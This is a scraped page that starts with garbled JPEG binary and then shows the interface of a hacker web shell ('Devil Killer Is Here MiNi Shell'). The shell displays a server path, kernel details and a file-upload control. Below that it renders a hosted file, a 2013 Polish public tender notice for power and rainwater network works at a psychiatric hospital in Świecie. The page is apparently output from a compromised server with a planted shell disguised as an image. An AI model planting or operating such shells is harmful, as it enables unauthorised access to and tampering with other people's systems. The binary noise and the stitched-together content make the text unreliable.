JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131114/463442-N-2013.html

<p class="kh_header"><b>Toruń: Modernizacja sieci dostarczających media dla Wojewódzkiego Szpitala dla Nerwowo i Psychicznie Chorych w Świeciu</b><br>
<b>Numer ogłoszenia: 463442 - 2013; data zamieszczenia: 14.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kujawsko-Pomorskie Inwestycje Medyczne Sp. z o.o. , Plac Teatralny 2, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 656 10 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.kpim.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja sieci dostarczających media dla Wojewódzkiego Szpitala dla Nerwowo i Psychicznie Chorych w Świeciu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1 Przedmiot zamówienia polega wykonaniu robót budowlano - instalacyjnych w formule zaprojektuj i wybuduj na potrzeby Stacji Transformatorowej dla obiektów Szpitala Wojewódzkiego dla Nerwowo i Psychicznie Chorych w Świeciu polegających na wykonaniu:
1)
-  nowego budynku na potrzeby stacji transformatorowej (teren opracowania projektów jak i wykonawstwo podlega ochronie konserwatorskiej);
- wyposażenie stacji (rozdzielnia SN, rozdzielnia nN, transformator oraz agregat prądotwórczy);
- wykonanie nowej rozdzielni głównej w istniejącym budynku z wyposażeniem;
- wykonanie przełączenia na nowo wybudowaną stację transformatorową i rozdzielnię RG.
Zakres robót projektowo - wykonawczych:
a)	Wykonanie opracowań projektowych dotyczących poniższych zakresów robót elektrycznych, w których to projektach należy uwzględnić wszystkie niezbędne zabezpieczenia umożliwiające dalsze zaprojektowanie kolejnych etapów inwestycji związanych z indywidualnym przyłączeniem kolejnych budynków do nowej rozdzielni RG. Przy opracowaniu nowych tras kablowych należy wyeliminować kolizję z już projektowanymi sieciami innych branż tj. sieci kanalizacji deszczowych, sieci wodociągowej, sieci sanitarnej, sieci kanalizacji światłowodowej. Wykonanie projektu wielobranżowego budynku stacji transformatorowej z drogą dojazdową. Bryłę nowo projektowanego budynku jak i pozostałe zakresy  należy uzgodnić z służbami opiniującymi. Teren opracowania projektów jak i później wykonawstwo podlega ochronie konserwatorskiej. Bazą do określenia niezbędnej mocy projektowej będzie uzgodniona koncepcja z służbami szpitala.
b)	Wybudowanie nowego budynku na potrzeby stacji transformatorowej z drogą dojazdową i rozbiórką istniejącego budynku stacji.
c)	Wyposażenie stacji (rozdzielnia SN, rozdzielnia nN, transformator 400 kVA żywiczny suchy oraz agregat prądotwórczy 160kVA)
d)	Doprowadzenie zasilania do stacji transformatorowej z przyległego słupa SN, wykonanie linii kablowej zasilania podstawowego i rezerwowego w relacji stacja transformatorowa - rozdzielnia główna obiektu RG nN (budynek pralni).
e)	Wykonanie nowej rozdzielni głównej RG nN w istniejącym budynku pralni. Adaptacja pomieszczenia uwzględniająca przyszłą modernizację sieci (wykonanie przepustów, kanały kablowe) oraz remont pomieszczenia.
f)	Wykonanie przyłączenia na nowo wybudowaną stację transformatorową i rozdzielnię RGNN. Utylizacja wyposażenia budynku starej stacji transformatorowej. 
Stylistyka, architektura wybudowanego budynku do stacji transformatorowej musi komponować się z istniejącą architekturą. 
2) Wykonanie sieci kanalizacji deszczowej, w formule: wybuduj, zgodnie z dokumentacją pt. Pierwszy etap kanalizacji deszczowej dla obiektów Wojewódzkiego Szpitala dla Nerwowo i Psychicznie Chorych w Świeciu
3) Wykonanie sieci kanalizacji deszczowej w formule: wybuduj zgodnie z dokumentacją Drugi etap kanalizacji deszczowej dla obiektów Wojewódzkiego Szpitala dla Nerwowo i Psychicznie Chorych w Świeciu.Do niżej wymienionego zakresu z podłączeniami do budynków:
1. Odcinek od D9 do D26
2. Odcinek D23 do WP4 i WP5
3. Odcinek od D 24 do WP6 i WP7
4. Odcinek od D49 do D49/2
5. Odcinek od D25 do WP8
6. Odcinek od D12 do WP26 i WP27
UWAGA: Przy wykonywaniu prac związanych z modernizacją sieci należy mieć na uwadze  możliwość występowania siedlisk szczurów, które mogą stanowić utrudnienie w wykonywanych pracach. 
Zamawiający zaleca wizję lokalną na terenie objętym projektem i wykonawstwem..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 45.11.30.00-2, 45.31.00.00-3, 45.31.57.00-5, 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy żąda wniesienia wadium w kwocie 70 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - jeżeli złoży oświadczenie zgodnie z  art. 22 ust. 1 ustawy Pzp (załącznik nr 2 do SIWZ)
b) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają
wymagane uprawnienia, stanowiące załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia do wykonania zamówienia w zakresie robót objętych przedmiotem zamówienia, jeżeli Wykonawca złoży:
- oświadczenie zgodnie z art. 22 ust. 1 ustawy Pzp (załącznik nr 2 do SIWZ);
- wykaz wykonanych robót w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączenie dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - w tym wymagane jest przedstawienie co najmniej (załącznik nr 5 do SIWZ): 
a) 2 robót budowlanych na obiektach wpisanych do rejestru zabytków na kwotę minimum 1.000.000,00 zł brutto każda.
b) 1 robota budowlana polegająca na kompleksowym wykonaniu zasilania do budynku użyteczności publicznej w tym budowa stacji transformatorowej z agregatem prądotwórczym.

Robota wskazana w punkcie b może być wykonana w ramach robót wskazanych w puncie a.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dysponowania przez Wykonawcę odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia w zakresie objętym przedmiotem zamówienia, jeżeli Wykonawca złoży:
a) oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące załącznik nr 2 do
SIWZ;
b) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają
wymagane uprawnienia, stanowiące załącznik nr 4 do SIWZ;
c) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na
temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania
zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie
do dysponowania tymi osobami (załącznik nr 3 do SIWZ), tj.:
- kierownik budowy  z uprawnieniami konstrukcyjno-budowlanymi bez ograniczeń i minimum 5-letnim doświadczeniem zawodowym,
- kierownik robót z uprawnieniami instalacyjnymi w zakresie sieci, , instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń i minimum 5-letnim doświadczeniem zawodowym, 
- kierownik robót z uprawnieniami instalacyjnymi w zakresie sieci instalacji i urządzeń
elektrycznych i elektroenergetycznych bez ograniczeń i minimum 5-letnim doświadczeniem zawodowym,  
- projektant w specjalności architektonicznej, z minimum 3-letnim doświadczeniem zawodowym obejmującym prace na obiektach zabytkowych,
- projektant w specjalności konstrukcyjnej, z minimum 3-letnim doświadczeniem zawodowym
- projektant sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych z minimum 3-letnim doświadczeniem zawodowym,
- projektant sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych z minimum 3- letnim doświadczeniem zawodowym,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dysponowania przez Wykonawcę odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia w zakresie objętym przedmiotem zamówienia, jeżeli Wykonawca złoży:
a) oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące załącznik nr 2 do
SIWZ;
b) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają
wymagane uprawnienia, stanowiące załącznik nr 4 do SIWZ;
c) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na
temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania
zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie
do dysponowania tymi osobami (załącznik nr 3 do SIWZ), tj.:
- kierownik budowy  z uprawnieniami konstrukcyjno-budowlanymi bez ograniczeń i minimum 5-letnim doświadczeniem zawodowym,
- kierownik robót z uprawnieniami instalacyjnymi w zakresie sieci, , instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń i minimum 5-letnim doświadczeniem zawodowym, 
- kierownik robót z uprawnieniami instalacyjnymi w zakresie sieci instalacji i urządzeń
elektrycznych i elektroenergetycznych bez ograniczeń i minimum 5-letnim doświadczeniem zawodowym,  
- projektant w specjalności architektonicznej, z minimum 3-letnim doświadczeniem zawodowym obejmującym prace na obiektach zabytkowych,
- projektant w specjalności konstrukcyjnej, z minimum 3-letnim doświadczeniem zawodowym
- projektant sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych z minimum 3-letnim doświadczeniem zawodowym,
- projektant sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych z minimum 3- letnim doświadczeniem zawodowym,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, jeżeli Wykonawca dołączy do oferty:
a) oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące załącznik nr 2 do SIWZ,
b) opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę minimum 2.000.000,00 zł, w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany Formularz ofertowy (załącznik nr 1 do SIWZ). 
2. Oświadczenie Wykonawcy wskazujące na tę część zamówienia, której wykonanie zamierza ewentualnie powierzyć podwykonawcom załącznik nr 6 do SIWZ (zgodnie z art. 36 ust. 4 ustawy Pzp ) - załączyć w przypadku udziału podwykonawców.
3. Oświadczenie o woli współpracy Wykonawców wspólnie składających ofertę ustanawiające pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy w sprawie zamówienia publicznego (wyznaczenie lidera), w myśl  art. 23 
ustawy Pzp - jeżeli dotyczy.
4. Pełnomocnictwo - jeżeli dotyczy.
5. Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków ich wprowadzenia:
1)	okoliczności stanowiące podstawę zmiany sposobu spełnienia świadczenia lub ceny:
a)	niedostępność na rynku materiałów lub urządzeń wskazanych w ofercie, dokumentacji projektowej lub technicznej spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów  lub urządzeń;
b)	pojawienie się na rynku, części, materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy;
c)	pojawienie się nowszej technologii wykonania przedmiotu zamówienia pozwalającej na zaoszczędzenie czasu realizacji zamówienia lub jego kosztów, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
2)	warunki dopuszczalności zmian osobowych:
a)	zmiana osoby określonej w SIWZ lub umowie, przy pomocy której Wykonawca realizuje przedmiot umowy na inną jest dopuszczalna pod warunkiem legitymowania się przez nową osobę co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane lub innych ustawach;
b)	zmiana osoby przy pomocy której Wykonawca realizuje przedmiot umowy, a od której wymagano określonego doświadczenia lub wykształcenia jest dopuszczalna pod warunkiem legitymowania się przez nową osobę doświadczeniem lub wykształceniem spełniającym wymóg SIWZ.
3)	okoliczności stanowiące podstawę zmiany sposobu spełnienia świadczenia lub terminu, a także innych zmian, gdy jest to niezbędne dla wykonania przedmiotu umowy w sposób należyty:
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy - wynagrodzenie Wykonawcy za wykonanie przedmiotu umowy ulega obniżeniu o kwotę obliczoną według cen rynkowych z dnia podpisania umowy, 
c)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami, w takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji;
d)	zmiany spowodowane warunkami atmosferycznymi, w szczególności klęskami żywiołowymi lub zaistnieniem nieprzewidywalnych warunków fizycznych (przez które należy rozumieć jakiekolwiek działanie sił natury, którego nie dało się przewidzieć lub takie, że od doświadczonego wykonawcy nie można było w sposób rozsądny oczekiwać zastosowania przeciw nim wystarczających środków ostrożności) uniemożliwiających prowadzenie robót budowlanych, dokonywanie odbiorów;
e)	zimowe warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych - w zakresie wydłużenia terminu o okres trwania tej przeszkody,
f)	obfite i długotrwałe opady atmosferyczne uniemożliwiające prowadzenie robót budowlanych - w zakresie wydłużenia terminu o okres trwania tej przeszkody,
g)	zmiany spowodowane warunkami geologicznymi, terenowymi, wodnymi itp., w szczególności niewypały i niewybuchy lub wykopaliska archeologiczne, nie przewidywane w SIWZ;
h)	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymanie realizacji umowy przez Zamawiającego;
i)	opóźnienia w wydawaniu decyzji, opinii lub w wykonywaniu innych czynności przez instytucje i urzędy, koniecznych dla prawidłowej realizacji umowy. 
4)	inne dopuszczalne zmiany
a)	wydłużenie okresu gwarancji lub rękojmi, o dowolny okres;
b)	zmiana ceny brutto odzwierciedlająca zmianę obowiązującej stawki podatku od towarów i usług (VAT);
2.	Zmiany, o których mowa w ust. 1 pkt 1:
